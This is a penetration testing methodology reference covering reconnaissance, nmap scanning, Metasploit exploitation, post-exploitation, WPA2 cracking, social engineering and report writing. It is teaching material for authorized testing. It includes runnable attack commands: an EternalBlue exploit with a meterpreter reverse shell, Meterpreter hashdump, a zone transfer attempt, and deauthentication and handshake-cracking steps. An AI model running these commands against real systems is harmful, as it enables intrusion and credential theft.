Penetration Testing Methodology¶
End-to-end penetration testing workflow: reconnaissance (passive and active), scanning, exploitation with Metasploit, post-exploitation, and professional reporting. Covers infrastructure, network, and wireless attack vectors.
Key Facts¶
- Pentesting phases: Recon -> Scanning -> Exploitation -> Post-Exploitation -> Reporting
- Passive recon (Shodan, DNS, OSINT) is undetectable by target
- nmap SYN scan (
-sS) is the default stealth scan with root privileges - Metasploit staged payloads are smaller but require callback; stageless are self-contained
- Reverse shells bypass ingress firewalls (target connects to attacker)
- Report structure: Executive Summary -> Scope -> Findings (severity-sorted) -> Evidence -> Remediation
Reconnaissance¶
Passive (No Target Contact)¶
# DNS enumeration
dig example.com ANY
dig axfr @ns1.example.com example.com # Zone transfer attempt
dnsenum example.com
# Subdomain discovery
sublist3r -d example.com
amass enum -d example.com
# Email/IP harvesting
theHarvester -d example.com -b google,bing,linkedin -l 500
Additional passive sources: Shodan, Certificate Transparency (crt.sh), WHOIS, Google Dorking (site:example.com filetype:pdf).
Active (Detectable)¶
Port scanning, banner grabbing, directory brute-forcing:
# Directory enumeration
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
ffuf -w wordlist.txt -u http://target.com/FUZZ
Scanning¶
nmap¶
nmap -sS target # SYN scan (stealth, requires root)
nmap -sT target # TCP connect (no root needed)
nmap -sU target # UDP scan
nmap -sV target # Service version detection
nmap -O target # OS detection
nmap -A target # Aggressive (OS + version + scripts + traceroute)
nmap -p- target # All 65535 ports
nmap -sn 10.0.0.0/24 # Host discovery only (ping sweep)
nmap -Pn target # Skip host discovery
# NSE Scripts
nmap --script vuln target # All vulnerability scripts
nmap --script smb-vuln-ms17-010 target # Specific CVE check
nmap --script http-enum target # HTTP directory enum
nmap --script "smb-*" target # All SMB scripts
Vulnerability Scanning¶
- Nessus - commercial, most widely used
- OpenVAS/GVM - open-source alternative
- Authenticated scans are far more thorough than unauthenticated
- False positive management is critical - verify before reporting
Exploitation¶
Metasploit Framework¶
msfconsole
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.0.0.5
set LHOST 10.0.0.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
# Meterpreter post-exploitation
sysinfo # System info
getuid / getsystem # Current user / privesc attempt
hashdump # Dump password hashes
shell # OS shell
upload /local/file /remote/path
download /remote/file /local/path
portfwd add -l 8080 -p 80 -r 10.0.0.10 # Port forwarding
Payload Types¶
- Staged (
windows/meterpreter/reverse_tcp) - small stager downloads full payload - Stageless (
windows/meterpreter_reverse_tcp) - full payload in one binary - Reverse shell - target connects back to attacker (bypasses ingress firewall)
- Bind shell - target opens port, attacker connects
Wireless Attacks¶
WPA2 Cracking¶
airmon-ng start wlan0 # Monitor mode
airodump-ng wlan0mon # Discover networks
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon # Target capture
aireplay-ng -0 5 -a BSSID wlan0mon # Deauth (force handshake)
aircrack-ng -w wordlist.txt capture-01.cap # Crack
# GPU-accelerated cracking
hcxpcapngtool capture-01.cap -o hash.hc22000
hashcat -m 22000 hash.hc22000 wordlist.txt
Rogue AP / Evil Twin¶
Clone legitimate AP SSID, serve captive portal to capture credentials. Tools: hostapd + dnsmasq.
Social Engineering¶
- Spear phishing - targeted emails with malicious links/attachments
- Whaling - targeting executives
- Vishing - phone-based social engineering
- Pretexting - fabricated scenario (impersonating IT, vendor)
- Tools: GoPhish, King Phisher
Report Writing¶
Finding Severity¶
| Severity | Examples |
|---|---|
| Critical | RCE, auth bypass, domain admin compromise |
| High | Privilege escalation, sensitive data exposure, SQLi |
| Medium | Stored XSS, CSRF, information disclosure |
| Low | Missing headers, verbose errors, outdated software (no known exploit) |
| Info | Best practice recommendations |
Each finding needs: description, business risk, step-by-step remediation, verification steps.
Gotchas¶
- Always have written authorization (scope, rules of engagement) before testing
- Exploitation of one vulnerability may crash the service - test in maintenance windows when possible
- Default Metasploit payloads are detected by most AV/EDR - custom/encoded payloads needed for real engagements
- Unauthenticated nmap scans miss many vulnerabilities that authenticated scans find
- Network scanning can trigger IDS/IPS alerts and automated blocking (fail2ban)
See Also¶
- privilege escalation techniques - Linux and Windows privesc
- active directory attacks - AD-specific attack paths
- burp suite and web pentesting - web application testing
- osint and reconnaissance - passive information gathering